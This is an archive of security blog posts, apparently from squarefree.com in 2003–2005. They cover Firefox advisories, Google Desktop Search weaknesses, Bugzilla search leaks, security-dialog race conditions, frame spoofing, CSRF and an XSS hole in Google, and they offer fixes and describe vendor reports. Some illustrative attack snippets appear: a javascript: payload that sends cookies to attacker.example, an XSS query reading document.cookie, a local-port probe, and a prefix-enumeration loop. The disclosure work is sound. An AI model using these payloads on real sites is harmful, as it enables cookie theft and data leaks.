Security advisories for old versions of Firefox

Dan Veditz has updated the Mozilla Foundation Security Advisories page with information about holes that were fixed for Firefox 1.0, Thunderbird 0.9 and 1.0, and Mozilla 1.7.5.

None of the holes were arbitrary-code-execution holes, which surprised me. The worst hole fixed for Firefox 1.0 was the javascript: Live Bookmarks hole, which required some user cooperation and allowed attackers to steal cookies and sometimes execute arbitrary code. In contrast, many previous Mozilla and Firefox releases included new fixes for memory management holes such as buffer overflows. Exploits for memory management holes are harder to write, but they allow attackers to execute arbitrary code without getting any cooperation from users.
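
For readers unfamiliar with this class of hole: once a site can get a javascript: URL to run in another page's context, it can read that page's cookies and ship them elsewhere. A generic illustration of the payload shape (not the actual Live Bookmarks exploit, whose delivery mechanism was the interesting part):

  javascript:void(new Image().src = "http://attacker.example/log?c=" + encodeURIComponent(document.cookie))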

Posted on January 25, 2005 at 09:45 PM in Mozilla, Security | Comments (10) | TrackBack (0)

Coming soon to squarefree.com

I have trouble completing personal projects that take longer than a weekend. I often lose interest after doing the interesting parts and procrastinate indefinitely on completing the projects since they have no deadline. In August 2004, I set a goal compatible with my attention span: "start and finish one interesting project every weekend". This goal helped me write a bunch of Firefox extensions and one or two Firefox patches, but of course it didn't help me finish longer projects. Now I have several half-finished longer-than-a-weekend projects piled up.

I'm hoping that this "coming soon" post will make me finish at least some of these projects soon. Also, you can tell me which projects you want me to finish first.

  • A novel attack against something that was proven secure using what I think is a poor definition of security.
  • A proof that a popular puzzle is NP-complete.
  • A list of some of Firefox's weaknesses, design elements that can lead to security holes.
  • Security tips for Firefox users (current version). Since this document is already 7 printed pages long without screenshots, it may be more effective at pointing out critical user interface flaws in Firefox and Windows than at educating users.
  • Security tips for web application developers (current version).
  • Security tips for Firefox developers and extension developers (current version).
Posted on January 17, 2005 at 07:05 AM in Mozilla, Research, Security | Comments (6) | TrackBack (1)

My impressions of Google Desktop Search

Google Desktop Search is useful enough for me to keep it installed, but I wouldn't say that it works well.

Functionality

  • The file I'm looking for is often missing from Google Desktop Search's index. Even the filename is missing. I can't tell whether it decided to skip the file because of its extension, contents, location, or last-modified date. Sometimes touching the file gets it indexed, but sometimes it doesn't.
  • It "caches" old versions of files often enough to take up disk space unnecessarily, but not often enough that I can rely on it for a revision history when I break something.
  • Since Google Desktop Search is slower than www.google.com, leaving "Show Desktop Search results on Google Web Search result pages" checked slows down web searches.
  • It gets much slower if I add num=100 to the URLs. A search with num=100 usually takes 3 seconds. This would be ok if it streamed the results, but I just don't see anything for 3 seconds. (There's no UI for adding num=100, so it's not really fair to complain.)

Security

  • "Show Desktop Search results on Google Web Search result pages", which is checked by default, elevates any XSS hole in www.google.com to a read-my-files hole.
  • Google Desktop Search uses an interesting scheme to mitigate XSS and CSRF holes: it includes a hash in every URL, even the root. The hash includes the path and sometimes includes the query parameters. If the hash is missing or doesn't match, it returns "Invalid Request".
  • Clicking a link to an .exe file in search results runs it without any warning.
  • The web site doesn't mention the current version number. The program doesn't have a "Check for upgrades" link, and if it checks automatically, it gives no indication of doing so.
  • Any web page can detect whether you have Google Desktop Search running by loading an image (or perhaps any URL) from http://127.0.0.1:4664/ (see the sketch after this list).
  • The index is stored in a predictable location. "File upload holes", which let sites read your files if they know the filenames, are common in web browsers. File upload holes that require no user interaction are usually fixed quickly. But file upload holes that do require user interaction are not always fixed quickly. Two file upload holes requiring user interaction that I reported in 2000 are still present in IE and Firefox.
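
To make the detection point concrete, here is a minimal sketch of the probe, assuming a made-up reportResult() and guessing at a path; whether onload or onerror fires (and how quickly) tells the page whether anything answers on that port:

  // Not Google's code: probe a local port by trying to load an image from it.
  var probe = new Image();
  probe.onload  = function () { reportResult(true);  };   // something served an image
  probe.onerror = function () { reportResult(false); };   // nothing there, or not an image
  probe.src = "http://127.0.0.1:4664/favicon.ico";         // the path is a guess

  function reportResult(found) {
    // A real page would send this back to its own server; here we just log it.
    console.log("Google Desktop Search appears to be running: " + found);
  }
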
Posted on October 22, 2004 at 03:38 AM in Google, Security | Comments (7) | TrackBack (0)

Hidden search results - answer

Michael Lefevre and mpt gave correct, but incomplete, answers to the question in my previous blog entry in their comments. Part of Michael's answer:

You'd have to work out which bits of closed bugs should be queryable (if you give any indication of a result based on, say, summary or comment queries, you could be disclosing important bits of the closed bug).

Indicating hidden results for a summary query would indeed disclose an important bit of the bug: its summary. First, the attacker would query for bugs with summaries starting with "a", "b", etc. Discovering that at least one hidden bug's summary begins with "b", the attacker would query for bugs whose summaries start with "ba", "bb", etc. After a few hundred more queries, the attacker would have the entire summary.
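
To make the enumeration concrete, here is a rough sketch of the attacker's loop in today's JavaScript, assuming a hypothetical hiddenMatches(prefix) that returns how many hidden bugs have summaries starting with the given prefix (exactly the signal a Google-style "we omitted some results" notice would leak):

  // Recover a hidden bug summary one character at a time.
  async function recoverSummary(hiddenMatches) {
    var alphabet = "abcdefghijklmnopqrstuvwxyz0123456789 ";
    var prefix = "";
    for (;;) {
      var next = null;
      for (var ch of alphabet) {
        if (await hiddenMatches(prefix + ch) > 0) {   // some hidden summary starts this way
          next = prefix + ch;
          break;
        }
      }
      if (next === null) return prefix;               // no extension matched: summary is complete
      prefix = next;
    }
  }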

Posted on August 14, 2004 at 08:53 PM in Google, Mozilla, Security | Comments (2) | TrackBack (0)

Hidden search results

Google sometimes hides search results to ensure that search results are varied:

In order to show you the most relevant results, we have omitted some entries very similar to the 15 already displayed. If you like, you can repeat the search with the omitted results included. [foo site:squarefree.com]

or due to bad laws:

In response to a complaint we received under the Digital Millennium Copyright Act, we have removed 1 result(s) from this page. If you wish, you may read the DMCA complaint for these removed results. [scientology site:xenu.net]

Bugzilla also sometimes hides search results, to protect confidential bugs such as undisclosed security holes. Unlike Google, Bugzilla doesn't tell you that there are hidden results for your search. This caused me to worry that potential employers would think I can't count. It also makes it impossible for Peter(6) and others to tell exactly how many release blockers there are.

When Bugzilla hides search results from you, why doesn't it inform you like Google does?

Hint: while "Because nobody implemented that feature" may be technically correct, that's not the answer I'm looking for.

Posted on August 14, 2004 at 02:42 AM in Google, Mozilla, Security | Comments (8) | TrackBack (0)

Bounties

mozilla.org now has a security bug bounty program, which offers $500 to people who discover "critical" security holes. Meanwhile, Microsoft offers a $250,000 bounty for catching virus authors.

Posted on August 02, 2004 at 09:36 AM in Mozilla, Security | Comments (2) | TrackBack (0)

Preventing browser UI spoofing

The problem of web sites being able to spoof browser UI was on Slashdot recently. This is a hard problem that browser vendors have known about for a long time.

The most popular solution, preventing web sites from disabling the status bar, is insufficient. Keeping the status bar always on would only keep malicious sites from spoofing https sites. In contrast, keeping the address bar always on would keep malicious sites from spoofing all web sites. It would also be more effective at preventing web sites from spoofing native applications.

One argument for using the status bar is that it's smaller than the address bar. But the status bar is only about 8px shorter than the address bar if we use small-icons mode for pop-ups, and we can probably make the address bar shorter still.

One suggestion was to show the hostname in the status bar. The hope is that users would then look there instead of the address bar to verify what site they're on. I don't think enough users would change their habits for this to work. It would also require cluttering the status bar in ordinary windows, which seems like a high price to pay to save 8px in pop-up windows.

Whatever we choose (address bar or status bar), we can do things to avoid breaking existing web sites. If a web site requests a 400x300 window without an address bar, we can give it a 400x334 window with an address bar. We can add a menubutton to the address toolbar in pop-up windows with menu items "Restore toolbars", "Hide address toolbar", and "Hide address toolbar in all pop-ups from https://gmail.google.com/".
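
For context, this is roughly how a site requests a chrome-less pop-up (the feature string is illustrative; details vary by site and browser). Under the proposal above, the browser would honor the 400x300 content size but re-add the address bar, growing the outer window by the bar's height:

  // Typical pop-up request: a small window with no address bar or toolbars.
  window.open("compose.html", "compose",
              "width=400,height=300,location=no,toolbar=no,menubar=no,status=yes");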

Posted on August 01, 2004 at 11:54 PM in Mozilla, Security | Comments (13) | TrackBack (1)

Adam Sacarny on the shell: hole

Adam Sacarny, author of the Mozilla shell: vulnerability timeline, discusses what Mozilla can do to work around future holes in programs that register themselves as protocol handlers.

Posted on July 25, 2004 at 08:54 PM in Mozilla, Security | Comments (0) | TrackBack (0)

Race conditions in security dialogs

I discovered arbitrary code execution holes in Firefox, Internet Explorer, and Opera that involve human reaction time. One version of the attack works like this:

[Captcha image from the demo. Alt text: "The secret word fills the blank in the sentence 'If ____ web developers would use alternate text correctly!' It is all lowercase."]

The page contains a captcha displaying the word "only" and asks you to type the word to verify that you are a human. As soon as you type 'n', the site attempts to install software, resulting in a security dialog. When you type 'y' at the end of the word, you trigger the 'Yes' button in the dialog. I made a demo of this attack for Firefox and Mozilla.
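
In outline, the page only has to watch keystrokes and open the dialog at the right moment; the victim's own final keystroke does the rest. A sketch, with a hypothetical triggerInstallDialog() standing in for whatever the demo page actually calls:

  // The captcha word is "only": the 'n' opens the dialog, and the user's
  // trailing 'y' activates the dialog's "Yes" button.
  document.addEventListener("keydown", function (event) {
    if (event.key === "n") {
      triggerInstallDialog();   // hypothetical: whatever opens the install prompt
    }
  });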

Another form of the attack involves convincing the user to double-click a certain spot on the screen. This spot happens to be the location where the 'Yes' button will appear. The first click triggers the dialog; the second click lands on the 'Yes' button. I made a demo of this attack for Firefox and Mozilla.

These types of attack work on any security dialog that can be triggered by untrusted content. The attack is most useful in a dialog where one of the buttons means "Yes, let this untrusted content run arbitrary code". Firefox has such a dialog in the form of the extension installation (XPI) dialog. Similarly, Internet Explorer has the ActiveX installation dialog and Opera has an "Open" button for downloaded executables. Programs other than browsers might also be vulnerable.

Firefox's solution, from bug 162020, is to delay enabling the "Yes"/"Install" buttons until three seconds after the dialog appears. I believe that this is the only possible fix other than completely denying untrusted content the ability to pose the dialog. Unfortunately, this fix is frustrating for users who install extensions often.
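
The fix is simple to sketch. Here is the idea in plain page JavaScript, though the real change lives in Firefox's dialog code rather than in web content, and the button id is made up:

  // Keep the dangerous button unclickable until the user has had time to react.
  var installButton = document.getElementById("install");   // hypothetical button id
  installButton.disabled = true;
  setTimeout(function () {
    installButton.disabled = false;    // enabled only after the 3-second delay
  }, 3000);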

Some users have been intentionally lowering the delay to 0 seconds, which frustrates me. These users think the delay was added merely to force everyone to read the dialog. It surprises me that these users were not able to figure out the security hole given the fix. Ironically, advanced users are the most susceptible to these attacks, because they type and double-click faster than they react to unexpected stimuli.

It might be possible to lower the delay to less than three seconds, making it less annoying, without jeopardizing security. Designing experiments to determine the minimum "safe" delay would be tricky. You would want to do everything an attacker could do to increase participants' reaction time: give them a complicated task, make new rectangles appear every second to make the dialog less unexpected, etc.

It might make sense to make the dialog appear only after the user clicks a statusbar indicator that means "This web site wants to install software". This would get rid of the problem of choosing a delay, and it wouldn't require users who want to install extensions to wait.

Cross-browser security holes

Slashdot reports a "new" spoofing hole in many browsers, including older versions of Mozilla, discovered by Mark Laurence. The hole is that site A can load its own content into a frame on site B, and the content will appear to be from site B because the frameset is still from site B. This attack only works if site B is a framed site, so some banks are not affected.
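
The mechanics are simple: before the fix, a window's frames could be navigated by name from any other page. A sketch with made-up site and frame names:

  // Pre-fix behavior, illustrative names only.
  // 1. Open (or get the user to open) the framed target site.
  window.open("http://bank.example/", "bankWindow");
  // 2. Later, navigate one of its frames by name. Vulnerable browsers did not
  //    check that the navigating page came from the same site as the frameset,
  //    so the attacker's content shows up inside the bank's frame layout.
  window.open("http://attacker.example/fake-login.html", "contentFrame");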

A comment I posted on Slashdot:

Lorenzo Colitti and I found the same hole several weeks ago, independently of Mark Laurence. I reported it to mozilla.org on June 11 and to Microsoft and Opera on June 16. I got different results from each browser maker:

Mozilla (bugzilla.mozilla.org 246448): Fixed on June 14. Firefox 0.9 released with the fix June 14. Mozilla 1.7 released with the fix June 17.
Opera (bugs.opera.com 145283): No response.
Microsoft: On June 21, I received an e-mail containing the following: "... is by design. To prevent this behavior, set the 'Navigate sub-frames across different domains' zone option to Prompt or disable in the Internet zone. We are trying to get this fixed in Longhorn ... on getting this blocking on by default in XP SP2 but blocking these types of navigations is an app compatibility issue on many sites." I usually don't get any response from Microsoft when I report security holes to them; I think I only got a response this time because I used my employer's premier support contract with Microsoft.

Another cross-browser security hole I found (bugzilla.mozilla.org 162020) got similar responses from each browser maker: fixed in Mozilla 1.7 and Firefox 0.9; no response from Opera; confusing statement from Microsoft mentioning XP SP2. 162020 is an arbitrary code execution hole.

To be fair to Microsoft, the fix for the frame-spoofing hole did break a few sites. According to a bug filed today, the Charles Schwab brokerage site is one of the broken sites.

Posted on July 01, 2004 at 01:30 PM in Mozilla, Security | Comments (1) | TrackBack (1)

Sending encrypted e-mail

I had to install Enigmail and gpg in order to send a vulnerability report to CERT.

I am not happy with gpg's UI. I had to read this page to figure out which command-line options I had to use. GPG gives a vague yet serious-sounding warning if you use an empty "passphrase" when creating your key. (As far as I can tell, a strong passphrase protects you against someone who can read the file containing your private key, but other than that it doesn't increase security.) It asked me to move the mouse around and bang on the keyboard while it generated my keys, but it generated the keys in less than a second, making me worry that it didn't use any good sources of entropy when it created my key.

I was able to figure out how to use Enigmail without much trouble. I encountered lots of warning and error messages, but I think they were all necessary. (I didn't like the text "This message will appear 1 more time" at the bottom of most of the warnings, though. I don't want Enigmail to stop keeping me from making a mistake just because I almost made the mistake 2 times in the past!) Enigmail's options were split between the Options window and the Account Settings window, but that's a problem with Thunderbird in general.

Neither CERT nor Enigmail warned me that the subject of my e-mail would be sent unencrypted.

Posted on April 18, 2004 at 12:15 AM in Mozilla, Security | Comments (1) | TrackBack (0)

How to report a security hole to Microsoft

Hixie helped me report a security hole to Opera. Then Hixie and his friends at the W3C Technical Plenary tried to help me report it to Microsoft, offering these suggestions:

  • "There's probably a form on microsoft.com/ie."
  • "You report it to cnet."
  • "You break into Microsoft's systems using the exploit, and insert the bug into their bug system. Since you can only do that with security bugs, that filters out the non-security ones."

I think I reported the bug to Microsoft successfully. The language on Microsoft's form ("enhancement suggestion" and "wish" rather than "bug report") was discouraging, but I did get to check a box labeled "Security".

Posted on March 10, 2004 at 12:59 AM in Mozilla, Security | Comments (4) | TrackBack (0)

MozillaZine fixes information leak

Three hours before Firefox 0.8 was released, I found a security hole in MozillaZine: you could see the titles of unpublished articles (e.g. http://mozillazine.org/talkback.html?article=4283) in the titlebar. Using this hole, I accidentally discovered the name change before the release. The hole has been fixed.

jesus_X informs me that long ago, MozillaZine let you see the full text of unpublished articles. I guess the original hole was partially fixed, leaving only the title of the article visible.

Posted on February 11, 2004 at 12:38 AM in Mozilla, Security | Comments (8) | TrackBack (0)

Another Google security hole

This simple hole allows any site to change your Google preferences behind your back. Someone could change your Google interface language to Pig Latin. (Why Pig Latin rather than, say, Russian? It's more fun, and the "Google.com in English" link isn't as obvious when the surrounding text looks like English.) Someone could make your searches only turn up English results. Worst of all, someone could stop you from using Google to search for porn by turning on SafeSearch.

Slashdot's solution to this type of hole is "formkeys". I don't know how other sites solve it. But one incorrect solution is to check referers.
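
A formkey is essentially a per-session secret that a forged cross-site request cannot supply. A minimal sketch of the idea (not Slashdot's or Google's actual code), using Node's crypto module:

  var crypto = require("crypto");
  var SERVER_SECRET = "keep-this-off-the-wire";   // assumption: known only to the server

  // Embed this value in a hidden field of the preferences form.
  function makeFormKey(sessionId) {
    return crypto.createHmac("sha256", SERVER_SECRET).update(sessionId).digest("hex");
  }

  // Reject any submission whose key doesn't match the session it claims to come from.
  function isValidFormKey(sessionId, submittedKey) {
    return submittedKey === makeFormKey(sessionId);
  }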

Posted on October 23, 2003 at 09:30 PM in Google, Security | Comments (2) | TrackBack (0)

Minor security hole in Google

Webmasterworld's "hitchhiker" and I found a security hole in Google today. He searched for something like "this can't be true" and his browser reported a JavaScript syntax error. I pointed out that with a carefully constructed query string, you can get Google to spit out something syntactically valid that does whatever you want. For example:

http://www.google.com/search?q='+alert(document.cookie)+'
causes Google to generate the following onClick attribute:

onClick="c('http://images.google.com/images?q='+alert(document.cookie)+'&hl=en&lr=&ie=UTF-8&c2coff=1&safe=off','wi',event);"

If you follow the link and click a tab (web, images, groups, directory, news), you'll see your Google cookie in a dialog.

Hitchhiker responded:

I just can't believe G made that kinda mistake.

ESCAPE ESCAPE!

Escaping is not always the best solution. When I found a similar hole in some JavaScript code in Mozilla, ducarroz's solution was to use an alternative window.setTimeout syntax. The normal version of setTimeout takes a string to be parsed and executed; the alternative version takes a function and parameters. Instead of escaping the untrusted input, we avoided parsing a string containing the untrusted input.
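
The difference between the two forms, with made-up names (showResult and untrustedQuery are illustrative, not the actual Mozilla code):

  function showResult(q) { alert("query was: " + q); }
  var untrustedQuery = "'); alert(document.cookie); ('";   // attacker-controlled text

  // String form: the untrusted text is concatenated into source code and re-parsed.
  setTimeout("showResult('" + untrustedQuery + "')", 0);   // runs the injected alert

  // Function-plus-arguments form: the text is passed as data and never parsed as code.
  setTimeout(showResult, 0, untrustedQuery);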

Posted on October 23, 2003 at 08:15 PM in Google, Mozilla, Security | Comments (2) | TrackBack (0)

Selene wins

I use a program called Sharescan to search the Windows network at Mudd. I have found students sharing archived mail, friends' backup CDs, photos of themselves naked, and entire hard drives. I usually look through the data to determine the owner and remind them that the Windows network is for sharing music, er, inform them that they're sharing data that they probably weren't intending to share.

Today Selene told me over AIM that my shared folder was world-writable. Then she told me my printer was also shared and printed a page saying "Wuzza!" using my printer.

Posted on September 14, 2003 at 09:45 PM in Security | Comments (3) | TrackBack (0)